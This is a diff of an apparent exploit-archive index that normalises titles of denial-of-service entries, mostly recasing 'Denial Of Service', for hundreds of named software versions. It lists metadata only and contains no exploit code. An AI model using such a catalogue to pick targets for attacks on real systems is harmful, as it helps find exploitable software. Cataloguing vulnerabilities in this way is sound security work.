40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 -30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0 +30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service",2007-11-19,"Luigi Auriemma",linux,dos,0 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0 30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service",2008-01-02,greyvoip,multiple,dos,0 30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 - 'ierpplug.dll' PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",windows,dos,0 @@ -3898,7 +3898,7 @@ id,file,description,date,author,platform,type,port 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0 -30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial Of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 +30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 - NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 31002,platforms/linux/dos/31002.txt,"xine-lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos,0 @@ -3927,7 +3927,7 @@ id,file,description,date,author,platform,type,port 31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC (1)",2014-01-31,"Kees Cook",linux,dos,0 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0 -31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 +31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0 @@ -3940,7 +3940,7 @@ id,file,description,date,author,platform,type,port 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0 31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 -31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial Of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 +31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow / Denial of Service",2008-02-27,"Luigi Auriemma",windows,dos,0 31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",windows,dos,0 @@ -3951,7 +3951,7 @@ id,file,description,date,author,platform,type,port 31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption",2008-03-07,anonymous,windows,dos,0 31363,platforms/windows/dos/31363.txt,"Panda Internet Security/AntiVirus+Firewall 2008 - 'CPoint.sys' Memory Corruption",2008-03-08,"Tobias Klein",windows,dos,0 31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 -31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial Of Service",2008-03-10,"Luigi Auriemma",multiple,dos,0 +31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial of Service",2008-03-10,"Luigi Auriemma",multiple,dos,0 31381,platforms/windows/dos/31381.txt,"Motorola Timbuktu Pro 8.6.5 - Multiple Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,dos,0 31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0 @@ -3960,8 +3960,7 @@ id,file,description,date,author,platform,type,port 31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0 31429,platforms/multiple/dos/31429.py,"VideoLAN VLC Media Player 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,multiple,dos,0 31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0 -31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial Of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 -31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 - 'set_user_mode' Remote Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 +31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling - Denial of Service",2008-03-24,sipherr,hardware,dos,0 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities",2008-03-26,"Luigi Auriemma",multiple,dos,0 @@ -3970,22 +3969,22 @@ id,file,description,date,author,platform,type,port 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 -31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 -31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 - Kernel Usermode Callback Privilege Escalation (1)",2008-04-08,Whitecell,windows,dos,0 +31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 +31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)",2008-04-08,Whitecell,windows,dos,0 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0 31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0 31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0 -31607,platforms/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial Of Service",2008-04-04,ryujin,windows,dos,0 +31607,platforms/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service",2008-04-04,ryujin,windows,dos,0 31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial of Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service",2008-04-21,"Rodrigo Carvalho",osx,dos,0 -31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service",2008-04-21,"Core Security Technologies",osx,dos,0 +31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial of Service",2008-04-21,"Core Security Technologies",osx,dos,0 31627,platforms/unix/dos/31627.c,"LICQ 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0 31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos,0 -31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial Of Service",2008-04-10,ryujin,windows,dos,0 +31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial of Service",2008-04-10,ryujin,windows,dos,0 31656,platforms/windows/dos/31656.txt,"ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow",2008-04-16,"Leon Juranic",windows,dos,0 -31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial Of Service",2008-04-24,"Luigi Auriemma",windows,dos,0 +31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial of Service",2008-04-24,"Luigi Auriemma",windows,dos,0 31710,platforms/novell/dos/31710.txt,"Novell Groupwise 7.0 - HTML Injection / Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0 -31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 +31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0 31728,platforms/multiple/dos/31728.txt,"Call of Duty 4 1.5 - Malformed 'stats' command Denial of Service",2008-05-02,"Luigi Auriemma",multiple,dos,0 31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption",2008-05-06,Sowhat,windows,dos,0 @@ -4018,9 +4017,9 @@ id,file,description,date,author,platform,type,port 31964,platforms/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos,0 31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 -31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 +31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 -31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 +31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 31998,platforms/multiple/dos/31998.txt,"S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 - Multiple Remote Vulnerabilities",2008-06-28,"Luigi Auriemma",multiple,dos,0 31999,platforms/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x - Adding 'ibm-globalAdminGroup' Entry Denial of Service",2008-06-30,anonymous,multiple,dos,0 32000,platforms/linux/dos/32000.txt,"OpenLDAP 2.3.41 - BER Decoding Remote Denial of Service",2008-06-30,"Cameron Hotchkies",linux,dos,0 @@ -4030,16 +4029,16 @@ id,file,description,date,author,platform,type,port 32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,linux,dos,0 32054,platforms/windows/dos/32054.py,"MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,windows,dos,0 32056,platforms/windows/dos/32056.py,"BitComet 1.02 - URI Handling Remote Denial of Service",2008-07-16,Shinnok,windows,dos,0 -32086,platforms/multiple/dos/32086.c,"SWAT 4 - Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0 +32086,platforms/multiple/dos/32086.c,"SWAT 4 - Multiple Denial of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0 32104,platforms/multiple/dos/32104.txt,"ZDaemon 1.8 - Null Pointer Remote Denial of Service",2008-07-21,"Luigi Auriemma",multiple,dos,0 32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 - '.m3u' / '.pls' Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0 32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a - Psuedo Terminal Denial of Service",2008-07-23,kokanin,linux,dos,0 32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - Null Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",multiple,dos,0 -32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial Of Service / Memory Corruption",2008-07-30,"Luigi Auriemma",multiple,dos,0 +32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial of Service / Memory Corruption",2008-07-30,"Luigi Auriemma",multiple,dos,0 32136,platforms/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 -32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 +32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0 -32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial Of Service",2008-08-06,Antunes,multiple,dos,0 +32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,multiple,dos,0 32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0 32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos,0 @@ -4047,9 +4046,9 @@ id,file,description,date,author,platform,type,port 32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0 32256,platforms/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack Based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80 -32292,platforms/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial Of Service",2008-08-23,"Luka Treiber",linux,dos,0 +32292,platforms/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial of Service",2008-08-23,"Luka Treiber",linux,dos,0 32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",windows,dos,0 -32304,platforms/linux/dos/32304.txt,"Red Hat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",linux,dos,0 +32304,platforms/linux/dos/32304.txt,"RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",linux,dos,0 32305,platforms/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",hardware,dos,0 32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 - 'APPEND' Command Remote Denial of Service",2008-09-02,Antunes,multiple,dos,0 32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 - Malformed 'title' Tag Remote Denial of Service",2008-09-02,Exodus,multiple,dos,0 @@ -4057,14 +4056,14 @@ id,file,description,date,author,platform,type,port 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 32341,platforms/hardware/dos/32341.html,"Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service",2008-09-12,"Nicolas Economou",hardware,dos,0 -32348,platforms/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial Of Service",2008-03-28,"Kay Roepke",linux,dos,0 +32348,platforms/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial of Service",2008-03-28,"Kay Roepke",linux,dos,0 32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder Null Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 32362,platforms/multiple/dos/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service",2008-09-12,"Luigi Auriemma",multiple,dos,0 32381,platforms/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow",2008-09-12,0x90,multiple,dos,0 32384,platforms/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service",2007-07-20,"Jens Axboe",linux,dos,0 32386,platforms/multiple/dos/32386.txt,"Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service",2008-09-16,"Luigi Auriemma",multiple,dos,0 -32420,platforms/windows/dos/32420.c,"Mass Downloader - Malformed Executable Denial Of Service",2008-09-25,Ciph3r,windows,dos,0 +32420,platforms/windows/dos/32420.c,"Mass Downloader - Malformed Executable Denial of Service",2008-09-25,Ciph3r,windows,dos,0 32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 - HTTP Proxy Remote Denial of Service",2008-09-26,quakerdoomer,windows,dos,0 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0 32451,platforms/linux/dos/32451.txt,"Linux Kernel (Fedora 8/9) - 'utrace_control' Null Pointer Dereference Denial of Service",2008-10-02,"Michael Simms",linux,dos,0 @@ -4085,17 +4084,17 @@ id,file,description,date,author,platform,type,port 32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 -32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service",2008-11-09,killprog.org,windows,dos,0 -32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 +32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0 +32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 -32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial Of Service",2008-11-20,"Christian Hoffmann",multiple,dos,0 +32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",multiple,dos,0 32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,windows,dos,0 32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7 - HTML Form Value Denial of Service",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service",2008-12-22,"Alfredo Ortega",linux,dos,0 32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service",2008-12-23,"Herbert Xu",linux,dos,0 32688,platforms/windows/dos/32688.py,"Winace 2.2 - Malformed Filename Remote Denial of Service",2008-12-29,cN4phux,windows,dos,0 -32692,platforms/hardware/dos/32692.txt,"Symbian S60 - Malformed SMS/Mms Remote Denial Of Service",2008-12-30,"Tobias Engel",hardware,dos,0 +32692,platforms/hardware/dos/32692.txt,"Symbian S60 - Malformed SMS/Mms Remote Denial of Service",2008-12-30,"Tobias Engel",hardware,dos,0 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)",2009-01-01,"Jeremy Brown",osx,dos,0 32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 @@ -4103,28 +4102,28 @@ id,file,description,date,author,platform,type,port 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service",2014-04-05,LiquidWorm,windows,dos,0 32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0 -32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption (Denial Of Service)",2014-04-06,sajith,windows,dos,0 -32712,platforms/multiple/dos/32712.txt,"IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial Of Service",2009-01-08,Erik,multiple,dos,0 +32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption (Denial of Service)",2014-04-06,sajith,windows,dos,0 +32712,platforms/multiple/dos/32712.txt,"IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service",2009-01-08,Erik,multiple,dos,0 32715,platforms/php/dos/32715.php,"PHP 5.2.8 - 'popen()' Function Buffer Overflow",2009-01-12,e.wiZz!,php,dos,0 32726,platforms/linux/dos/32726.txt,"Ganglia gmetad 3.0.6 - 'process_path()' Remote Stack Buffer Overflow",2009-01-15,"Spike Spiegel",linux,dos,0 -32740,platforms/linux/dos/32740.txt,"QNX RTOS 6.4 - Malformed ELF Binary File Local Denial Of Service",2009-01-19,kokanin,linux,dos,0 +32740,platforms/linux/dos/32740.txt,"QNX RTOS 6.4 - Malformed ELF Binary File Local Denial of Service",2009-01-19,kokanin,linux,dos,0 32749,platforms/linux/dos/32749.txt,"Pidgin 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32754,platforms/osx/dos/32754.c,"Apple Mac OSX 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 -32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial Of Service",2009-01-27,Lostmon,windows,dos,0 -32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial Of Service",2009-01-30,strategma,php,dos,0 +32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial of Service",2009-01-27,Lostmon,windows,dos,0 +32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service",2009-01-30,strategma,php,dos,0 32772,platforms/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0 32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0 32815,platforms/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation",2009-02-25,"Chris Evans",linux,dos,0 -32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service",2009-02-25,Trancer,osx,dos,0 +32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,osx,dos,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi 